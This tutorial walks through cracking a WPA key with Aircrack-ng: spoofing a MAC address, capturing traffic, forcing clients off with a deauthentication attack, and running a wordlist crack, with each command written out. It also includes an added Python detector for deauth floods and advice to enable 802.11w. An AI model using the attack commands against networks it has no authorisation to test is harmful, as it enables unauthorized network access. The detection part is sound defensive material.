WiFi Protected Access, or WPA as it is commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Because more secure protocols are available, WEP encryption is now rarely used. In this tutorial, we will use the Aircrack suite to crack a WPA key. The Aircrack suite (or Aircrack-ng, as it is commonly called) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key.
How to do it...
Let's begin the process of using Aircrack to crack a network session secured by WPA.
1. Open a terminal window and bring up a list of wireless network interfaces.
airmon-ng
2. Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.
3. Next, we need to stop the wlan0 interface and take it down.
airmon-ng stop wlan0
ifconfig wlan0 down
4. Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55.
macchanger --mac 00:11:22:33:44:55 wlan0
5. Now we need to restart airmon-ng.
airmon-ng start wlan0
6. Next, we will use airodump to locate the available wireless networks nearby.
airodump-ng wlan0
7. A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.
8. Now we run airodump and copy the information for the selected BSSID to a file.
We will utilize the following options:
-c allows us to select our channel. In this case, we use 10.
-w allows us to select the name of our file. In this case, we have chosen wirelessattack.
--bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.
airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9. A new terminal window will open displaying the output from the previous command.
Leave this window open.
10. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax:
aireplay-ng --deauth 1 -a [BSSID] -c [our chosen MAC address] [Interface]
This process may take a few moments.
aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0
11. Finally, we run Aircrack to crack the WPA key. The -w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap.
aircrack-ng -w ./wordlist.lst wirelessattack.cap
That's it!
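The deauthentication step above (step 10) is what a wireless intrusion detection system looks for on the defending side: a burst of 802.11 deauth frames naming one BSSID is the signature of this technique. The following detector is an added example, not code from the original tutorial or from the Aircrack project. It assumes the input is a list of raw 802.11 frames without a radiotap header (as you would get from a monitor-mode capture saved with link type IEEE802_11), decodes the management frame header by hand, counts deauth frames per BSSID, and flags any that reach a threshold. The sample capture, the MAC addresses and the threshold are constructed for the example.

```python
import struct
from collections import Counter

# Alert when this many deauth frames name the same BSSID in one capture window.
# Constructed threshold for the example; tune it to the monitored network.
DEAUTH_THRESHOLD = 5

# 802.11 frame-control values used below
MGMT_TYPE = 0
SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes):
    """Decode the 24-byte 802.11 MAC header of a management frame.

    Returns a dict with subtype, addr1 (receiver), addr2 (transmitter) and
    addr3 (BSSID), plus the reason code for deauth frames, or None when the
    frame is not a management frame or is truncated.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3      # bits 2-3 of frame control: frame type
    subtype = (fc0 >> 4) & 0xF    # bits 4-7: frame subtype
    if ftype != MGMT_TYPE:
        return None
    info = {
        "subtype": subtype,
        "addr1": _mac(frame[4:10]),
        "addr2": _mac(frame[10:16]),
        "addr3": _mac(frame[16:22]),
    }
    if subtype == SUBTYPE_DEAUTH and len(frame) >= 26:
        # The deauth body is a single little-endian reason code.
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def find_deauth_floods(frames, threshold=DEAUTH_THRESHOLD):
    """Count deauth frames per BSSID and return those at or over the threshold."""
    counts = Counter()
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed and parsed["subtype"] == SUBTYPE_DEAUTH:
            counts[parsed["addr3"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


# --- Constructed sample capture (not real traffic) -------------------------
def _to_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def _frame(fc0: int, addr1: str, addr2: str, addr3: str, body: bytes = b"") -> bytes:
    """Assemble a raw frame for the sample only: frame control, duration,
    three addresses, sequence control, then the body."""
    return (bytes([fc0, 0x00]) + b"\x00\x00"
            + _to_bytes(addr1) + _to_bytes(addr2) + _to_bytes(addr3)
            + b"\x00\x00" + body)


AP = "aa:bb:cc:dd:ee:ff"        # constructed access point BSSID
OTHER_AP = "11:22:33:44:55:66"  # constructed second access point
CLIENT = "de:ad:be:ef:00:01"    # constructed client station

SAMPLE_FRAMES = (
    # six broadcast deauths carrying the AP's address: the flood pattern
    [_frame(0xC0, "ff:ff:ff:ff:ff:ff", AP, AP, struct.pack("<H", 7)) for _ in range(6)]
    # one beacon from the same AP (management, but not a deauth)
    + [_frame(0x80, "ff:ff:ff:ff:ff:ff", AP, AP, b"\x00" * 12)]
    # one ordinary deauth on another network: below the threshold
    + [_frame(0xC0, CLIENT, OTHER_AP, OTHER_AP, struct.pack("<H", 3))]
    # one data frame (type 2) that the parser ignores
    + [_frame(0x08, AP, CLIENT, AP, b"payload")]
)

if __name__ == "__main__":
    for bssid, n in find_deauth_floods(SAMPLE_FRAMES).items():
        print(f"possible deauth flood against {bssid}: {n} frames")
```

Run against the constructed sample, only the first access point is reported; the single deauth on the second network and the beacon are counted correctly but stay below the threshold. On a real network, the lasting fix is to enable Protected Management Frames (802.11w), which authenticates deauthentication frames so a forged one is discarded by the client rather than acted on.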